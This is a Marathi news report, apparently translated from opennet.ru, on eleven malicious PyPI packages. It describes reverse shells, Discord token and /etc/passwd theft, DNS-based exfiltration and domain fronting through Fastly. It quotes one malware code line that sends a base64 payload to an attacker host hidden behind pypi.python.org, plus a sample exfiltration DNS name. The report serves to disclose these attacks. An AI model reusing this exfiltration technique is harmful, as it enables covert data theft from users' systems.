PyPI (Python Package Index) निर्देशिकेत, दुर्भावनायुक्त कोड असलेली 11 पॅकेजेस ओळखली गेली. समस्या ओळखण्यापूर्वी, पॅकेजेस एकूण 38 हजार वेळा डाउनलोड केले गेले होते. आढळलेली दुर्भावनापूर्ण पॅकेजेस हल्लेखोरांच्या सर्व्हरसह संप्रेषण चॅनेल लपवण्यासाठी अत्याधुनिक पद्धती वापरण्यासाठी लक्षणीय आहेत.
- importantpackage (6305 डाउनलोड), important-package (12897) - pypi.python.org शी कनेक्ट करण्याच्या नावाखाली बाह्य सर्व्हरशी कनेक्शन स्थापित केले जेणेकरून सिस्टमला (रिव्हर्स शेल) शेल ऍक्सेस प्रदान केला जाईल आणि लपवण्यासाठी trevorc2 प्रोग्राम वापरला जाईल. संप्रेषण चॅनेल.
- pptest (10001), ipboards (946) - DNS चा वापर सिस्टीमबद्दल माहिती प्रसारित करण्यासाठी संप्रेषण चॅनेल म्हणून केला (पहिल्या पॅकेटमध्ये होस्ट नाव, कार्यरत निर्देशिका, अंतर्गत आणि बाह्य IP, दुसऱ्यामध्ये - वापरकर्ता नाव आणि होस्ट नाव) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - सिस्टममधील Discord सेवा टोकन ओळखले आणि ते बाह्य होस्टला पाठवले.
- trrfab (287) - /etc/passwd, /etc/hosts, /home च्या आयडेंटिफायर, होस्टचे नाव आणि सामग्री बाह्य होस्टला पाठवली.
- 10Cent10 (490) - बाह्य होस्टसह रिव्हर्स शेल कनेक्शन स्थापित केले.
- yandex-yt (4183) - nda.ya.ru (api.ya.cc) द्वारे जारी केलेल्या पुढील क्रियांबद्दल अतिरिक्त माहितीसह प्रणालीशी तडजोड केल्याबद्दल आणि पृष्ठावर पुनर्निर्देशित केल्याबद्दल संदेश प्रदर्शित केला.
महत्त्वाच्या पॅकेजमध्ये आणि महत्त्वाच्या-पॅकेज पॅकेजमध्ये वापरल्या जाणार्या बाह्य होस्टमध्ये प्रवेश करण्याची पद्धत विशेष लक्षात घ्या, ज्याने त्यांची क्रियाकलाप लपवण्यासाठी PyPI निर्देशिकेमध्ये वापरल्या जाणार्या फास्टली सामग्री वितरण नेटवर्कचा वापर केला. खरं तर, विनंत्या pypi.python.org सर्व्हरवर पाठविल्या गेल्या होत्या (HTTPS विनंतीमध्ये SNI मध्ये python.org नाव नमूद करण्यासह), परंतु HTTP “होस्ट” हेडरमध्ये आक्रमणकर्त्यांद्वारे नियंत्रित सर्व्हरचे नाव समाविष्ट होते (से. forward.io. global.prod.fastly.net). सामग्री वितरण नेटवर्कने डेटा प्रसारित करताना pypi.python.org वर TLS कनेक्शनचे पॅरामीटर्स वापरून आक्रमण करणाऱ्या सर्व्हरला समान विनंती पाठवली.
PyPI इन्फ्रास्ट्रक्चर फास्टली कंटेंट डिलिव्हरी नेटवर्कद्वारे समर्थित आहे, जे विशिष्ट विनंत्या कॅश करण्यासाठी वार्निश पारदर्शक प्रॉक्सी वापरते आणि प्रॉक्सीद्वारे HTTPS विनंत्या फॉरवर्ड करण्यासाठी अंतिम सर्व्हरऐवजी CDN स्तरावर TLS प्रमाणपत्र प्रक्रिया देखील वापरते. लक्ष्यित होस्ट काहीही असो, विनंत्या प्रॉक्सीला पाठवल्या जातात, जे HTTP “होस्ट” हेडर वापरून इच्छित होस्ट निर्धारित करते आणि होस्ट डोमेन नावे CDN लोड बॅलन्सर IP पत्त्यांशी जोडलेली असतात जी सर्व फास्टली क्लायंटसाठी वैशिष्ट्यपूर्ण असतात.
हल्लेखोरांचा सर्व्हर देखील CDN फास्टली सह नोंदणी करतो, जो प्रत्येकासाठी विनामूल्य योजना प्रदान करतो आणि निनावी नोंदणीला देखील परवानगी देतो. हे लक्षात घेण्यासारखे आहे की "रिव्हर्स शेल" तयार करताना पीडिताला विनंत्या पाठविण्यासाठी, एक योजना देखील वापरली जाते, परंतु आक्रमणकर्त्याच्या होस्टच्या बाजूने सुरू केली जाते. बाहेरून, आक्रमणकर्त्यांच्या सर्व्हरशी परस्परसंवाद PyPI निर्देशिकेसह कायदेशीर सत्रासारखे दिसते, PyPI TLS प्रमाणपत्र वापरून कूटबद्ध केले जाते. "डोमेन फ्रंटिंग" म्हणून ओळखले जाणारे तत्सम तंत्र, पूर्वी ब्लॉकिंगला बायपास करताना होस्टचे नाव लपविण्यासाठी सक्रियपणे वापरले जात असे, काही CDN नेटवर्क्समध्ये HTTPS मध्ये प्रवेश करण्याची क्षमता वापरून SNI मधील काल्पनिक होस्ट दर्शवून आणि प्रत्यक्षात त्याचे नाव प्रसारित करणे. TLS सत्रामध्ये HTTP होस्ट शीर्षलेखात होस्टची विनंती केली.
दुर्भावनायुक्त क्रियाकलाप लपवण्यासाठी, TrevorC2 पॅकेजचा वापर नियमित वेब नेव्हिगेशन प्रमाणेच सर्व्हरशी परस्परसंवाद करण्यासाठी देखील केला गेला, उदाहरणार्थ, "https://pypi.python.org/images/" प्रतिमा डाउनलोड करण्याच्या नावाखाली दुर्भावनापूर्ण विनंत्या पाठवल्या गेल्या. guid=” मार्गदर्शक पॅरामीटरमध्ये माहिती एन्कोडिंगसह. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'होस्ट': "psec.forward.io.global.prod.fastly.net"})
pptest आणि ipboards पॅकेजेस DNS सर्व्हरवरील क्वेरींमध्ये उपयुक्त माहिती एन्कोडिंगवर आधारित, नेटवर्क क्रियाकलाप लपवण्यासाठी भिन्न दृष्टीकोन वापरतात. मालवेअर "nu4timjagq4fimbuhe.example.com" सारख्या DNS विनंत्या करून माहिती प्रसारित करतो, ज्यामध्ये नियंत्रण सर्व्हरवर पाठवलेला डेटा सबडोमेन नावातील बेस64 फॉरमॅट वापरून एन्कोड केला जातो. आक्रमणकर्त्याला example.com डोमेनसाठी DNS सर्व्हर नियंत्रित करून हे संदेश प्राप्त होतात.
स्त्रोत: opennet.ru